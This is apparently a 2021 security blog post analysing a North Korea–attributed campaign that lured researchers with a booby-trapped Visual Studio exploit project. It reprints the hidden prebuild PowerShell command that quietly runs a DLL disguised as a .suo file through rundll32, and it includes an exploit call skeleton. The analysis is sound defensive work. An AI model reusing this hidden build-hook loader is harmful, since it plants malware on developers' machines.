# PANDORABOX - North Koreans target security researchers **[comae.com/posts/pandorabox-north-koreans-target-security-researchers/](https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/)** Posted by Matt Suiche | Published on January 26, 2021 Tags: `apt` `lazarus` Reading time: 3 minutes. Table Of Contents: ## Introduction Today, [Google’s Threat Analysis Group (TAG) published a blogpost explaining that several](https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/) security researchers have been targeted by (allegedly) North Korea. Since the operation seems to be targeting the curiosity of security researchers as an enabler for a successful ----- operation, we dubbed this operation `PANDORABOX .` No explanation was given on the attribution but Costin Raiu posted a screenshot from the Kaspersky Threat Attribution Engine which highlights code sharing between Manuscrypt (Lazarus). Note, that this alone isn’t enough for a successful attribution as it can be easily misled - maybe Google TAG has more information since they seemed to be so sure about who was behind the operation? KTAE code similarity analysis for the malware used to target security researchers involved in 0day analysis and development. "Manuscrypt" (also known as FALLCHILL) is typically used by the Lazarus APT. 👉 [pic.twitter.com/hXxuJIj9Lc](https://t.co/hXxuJIj9Lc) [— Costin Raiu (@craiu) January 26, 2021](https://twitter.com/craiu/status/1353964086455902208?ref_src=twsrc%5Etfw) The campaign seems to have been on-going for a while because the persona James Willy [(james0x40) created his GitHub account on the 16th April 2020.](https://api.github.com/users/james0x40) Two attack vectors were identified: The attacker would send a link to their blog, which would trigger a Chrome exploit [(CVE-2020-15994 ?) and infect the machine.](https://twitter.com/pwn_expoit/status/1353989996500328448) ----- The attacker would share a malicious visual studio project ( lpe-poc.zip ) over email or Telegram. ## Visual Studio Project We will focus on the Visual Studio project. The `dxgkrnl_poc.vcxproj VS project contains` a prebuild command which force-load `dxgkrnl_poc.vcxproj.suo . As you can see the` attackers, added several whitespaces to not make the command too obvious when someone would have a look. ``` powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path $(TargetName).vcxproj.suo)){rundll32 $(TargetName).vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231} powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path ``` ----- ``` $(TargetName).vcxproj.suo)){rundll32 $(TargetName).vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231} ``` The first parameter ( Bx9yb37GEcJNK6bt ) which is decryption key for strings, the same key can be found in the Google’s TAG blogpost - which makes sense if the DLL shared across all the targets is the same. Unlike the second parameter - here `4231 - which is different from` the Google TAG id ( 4901 ) this could be a potential identifier for the victims. This imply that the Visual Studio Project file had to be modified before being sent to each victim. Although, 5000 seems like a very high number of security researchers to be targeted. I don’t even know if the global pool of security researchers is that big. Nonetheless, if you have been targeted don’t hesitate to ping me on twitter at @msuiche to confirm your id is also different. The `dxgkrnl_poc.vcxproj.suo dll SHA2 hash is the following` ``` 4C3499F3CC4A4FDC7E67417E055891C78540282DCCC57E37A01167DFE351B244. More ``` [information about this file can be found on Norfolk blog.](https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/) ## Project 1: D3DKMTPresentMultiPlaneOverlay3 What’s the LPE, though? ``` void main() { EnumerateAdapters1(); DxgkCreateDevice(); DxgkCreateContext(); DxgkCreatePrimaryAllocation(); DxgkSetVidPnSourceOwner(); DxgkSetDisplayMode(); DxgkPresentMutiPlaneOverlay3(); } ``` The LPE seems to be targeted a DirectX vulnerability, which we were not able to reproduce, [which gets triggered by D3DKMTPresentMultiPlaneOverlay3 function.](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/d3dkmthk/nf-d3dkmthk-d3dkmtpresentmultiplaneoverlay3) This is kind of ironic because the group seems to have also targeted k0shl who wrote a blogpost about a `D3DKMTPresentMultiPlaneOverlay3 vulnerability (CVE-2018-8165` found by Richard Zhu) few years ago. OK, I don't want to cheer with you now.😡 [https://t.co/hl3h4S5JtT](https://t.co/hl3h4S5JtT) [pic.twitter.com/dU2tW9WzD9](https://t.co/dU2tW9WzD9) — k0shl (@KeyZ3r0) [January 26, 2021](https://twitter.com/KeyZ3r0/status/1353942078338686977?ref_src=twsrc%5Etfw) ----- No additional details on the `dxgkrnl!DxgkPresentMultiPlaneOverlay3 vulnerability will` be provided since we are unable to say if we weren’t able to reproduce the issue because only specific configurations can be triggered or because this vulnerability has already been patched. ## Project 2: Direct Composition Vulnerability (CVE-2020-17057) There is a also second archive that was shared with the security researchers with a working [exploit for what seem to be CVE-2020-17057.](https://blogs.360.cn/post/cve-2020-17057%20detail%20and%20exploit.html) ## Conclusion If you have a different id as a second parameter for the archive don’t hesitate to contact me on Twitter at @msuiche, and if you encountered another archive project too. It would be interesting to connect the dots. [360 Threat Intelligence Team linked the operation to the DREAMJOB Operation.](https://mp.weixin.qq.com/s/W-C_tKVnXco8C3ctgAjoNQ) -----